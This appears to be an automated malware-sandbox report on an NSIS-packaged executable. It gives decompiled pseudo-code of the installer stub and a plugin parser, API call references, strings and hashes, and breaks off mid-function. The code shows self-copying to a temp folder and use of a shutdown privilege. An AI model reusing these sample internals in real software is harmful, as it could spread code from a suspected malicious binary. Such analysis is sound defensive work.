									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\engineer\\AppData\\Local\\Temp", "C:\\Users\\engineer\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                                            0x00403248
                                                                                                            0x0040324c
                                                                                                            0x00403254
                                                                                                            0x00403256
                                                                                                            0x0040325b
                                                                                                            0x00403266
                                                                                                            0x0040326d
                                                                                                            0x00403275
                                                                                                            0x0040327f
                                                                                                            0x00403295
                                                                                                            0x004032a5
                                                                                                            0x004032aa
                                                                                                            0x004032b0
                                                                                                            0x004032b7
                                                                                                            0x004032ca
                                                                                                            0x004032cf
                                                                                                            0x004032d1
                                                                                                            0x004032d3
                                                                                                            0x004032d8
                                                                                                            0x004032d8
                                                                                                            0x004032e8
                                                                                                            0x004032ee
                                                                                                            0x00403357
                                                                                                            0x00403357
                                                                                                            0x00403359
                                                                                                            0x0040335b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004032f4
                                                                                                            0x004032f7
                                                                                                            0x004032ff
                                                                                                            0x004032ff
                                                                                                            0x00403302
                                                                                                            0x00403307
                                                                                                            0x00403309
                                                                                                            0x00403309
                                                                                                            0x0040330a
                                                                                                            0x0040330a
                                                                                                            0x0040330f
                                                                                                            0x00403312
                                                                                                            0x00403347
                                                                                                            0x0040334c
                                                                                                            0x00403351
                                                                                                            0x00403354
                                                                                                            0x00403356
                                                                                                            0x00403356
                                                                                                            0x00403356
                                                                                                            0x00000000
                                                                                                            0x00403314
                                                                                                            0x00403314
                                                                                                            0x00403315
                                                                                                            0x00403318
                                                                                                            0x00403320
                                                                                                            0x00403323
                                                                                                            0x00403325
                                                                                                            0x00403325
                                                                                                            0x00403325
                                                                                                            0x00403323
                                                                                                            0x00403328
                                                                                                            0x0040332e
                                                                                                            0x00403336
                                                                                                            0x00403339
                                                                                                            0x0040333b
                                                                                                            0x0040333b
                                                                                                            0x0040333b
                                                                                                            0x00403339
                                                                                                            0x0040333e
                                                                                                            0x00403345
                                                                                                            0x0040335f
                                                                                                            0x00403362
                                                                                                            0x0040336b
                                                                                                            0x00403370
                                                                                                            0x00403370
                                                                                                            0x0040337b
                                                                                                            0x00403381
                                                                                                            0x00403386
                                                                                                            0x00403388
                                                                                                            0x004033aa
                                                                                                            0x004033af
                                                                                                            0x004033b6
                                                                                                            0x004033bd
                                                                                                            0x004033c1
                                                                                                            0x00403428
                                                                                                            0x00403428
                                                                                                            0x0040342d
                                                                                                            0x00403437
                                                                                                            0x00403522
                                                                                                            0x00403528
                                                                                                            0x00403533
                                                                                                            0x0040353c
                                                                                                            0x0040353e
                                                                                                            0x00403543
                                                                                                            0x00403545
                                                                                                            0x00403547
                                                                                                            0x00403549
                                                                                                            0x0040354b
                                                                                                            0x0040354d
                                                                                                            0x0040354f
                                                                                                            0x0040355f
                                                                                                            0x00403561
                                                                                                            0x00403563
                                                                                                            0x00403570
                                                                                                            0x0040357f
                                                                                                            0x00403587
                                                                                                            0x0040358f
                                                                                                            0x0040358f
                                                                                                            0x00403563
                                                                                                            0x0040354f
                                                                                                            0x0040354b
                                                                                                            0x00403594
                                                                                                            0x0040359a
                                                                                                            0x0040359c
                                                                                                            0x004035a0
                                                                                                            0x004035a0
                                                                                                            0x0040359c
                                                                                                            0x004035a5
                                                                                                            0x004035aa
                                                                                                            0x004035ad
                                                                                                            0x004035af
                                                                                                            0x004035af
                                                                                                            0x004035b7
                                                                                                            0x004035b7
                                                                                                            0x00403446
                                                                                                            0x0040344d
                                                                                                            0x0040344d
                                                                                                            0x004033c9
                                                                                                            0x00403418
                                                                                                            0x00403418
                                                                                                            0x00403424
                                                                                                            0x00000000
                                                                                                            0x00403424
                                                                                                            0x004033d2
                                                                                                            0x004033df
                                                                                                            0x004033d6
                                                                                                            0x004033dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004033de
                                                                                                            0x004033de
                                                                                                            0x004033de
                                                                                                            0x004033e3
                                                                                                            0x004033e5
                                                                                                            0x004033ed
                                                                                                            0x00403459
                                                                                                            0x0040346d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403471
                                                                                                            0x00403478
                                                                                                            0x0040347e
                                                                                                            0x00403484
                                                                                                            0x0040348c
                                                                                                            0x0040348c
                                                                                                            0x0040349a
                                                                                                            0x004034a1
                                                                                                            0x004034aa
                                                                                                            0x004034b0
                                                                                                            0x004034bc
                                                                                                            0x004034c2
                                                                                                            0x004034cc
                                                                                                            0x004034e0
                                                                                                            0x004034e1
                                                                                                            0x004034e2
                                                                                                            0x004034f3
                                                                                                            0x004034f9
                                                                                                            0x00403500
                                                                                                            0x00403503
                                                                                                            0x00403509
                                                                                                            0x00403509
                                                                                                            0x00403500
                                                                                                            0x0040350d
                                                                                                            0x00403513
                                                                                                            0x00403513
                                                                                                            0x00403516
                                                                                                            0x00403517
                                                                                                            0x00403518
                                                                                                            0x00000000
                                                                                                            0x00403518
                                                                                                            0x004033ef
                                                                                                            0x004033f1
                                                                                                            0x004033fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403404
                                                                                                            0x0040340f
                                                                                                            0x00403414
                                                                                                            0x00000000
                                                                                                            0x00403414
                                                                                                            0x00403390
                                                                                                            0x0040339c
                                                                                                            0x004033a1
                                                                                                            0x004033a6
                                                                                                            0x004033a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004033a8
                                                                                                            0x00000000
                                                                                                            0x00403345
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004032f9
                                                                                                            0x004032f9
                                                                                                            0x004032f9
                                                                                                            0x004032fa
                                                                                                            0x004032fa
                                                                                                            0x00000000
                                                                                                            0x004032f9
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • #17.COMCTL32 ref: 0040325B
                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                              • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                              • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                              • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                            • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                                              • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                            • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000000), ref: 004032BD
                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000020), ref: 004032E8
                                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                            • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                            • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000000,00000000), ref: 00403459
                                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000000,00000000), ref: 00403465
                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                            • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\5t2CmTUhKc.exe,0041F058,00000001), ref: 004034D6
                                                                                                            • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                            • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                            • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\5t2CmTUhKc.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5t2CmTUhKc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                            • API String ID: 2278157092-3058993704
                                                                                                            • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                            • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                            • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                            • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 73611A98, Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E73611A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73611215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73611215();
				_t320 = E7361123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E736112FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73611534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73612259) & 0x000000ff) * 4 +  &M736121CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73611224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73611215();
											 &_v12 = E73611A36( &_v12);
											__eax = E73611429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73611A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73611A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7361305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73611A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
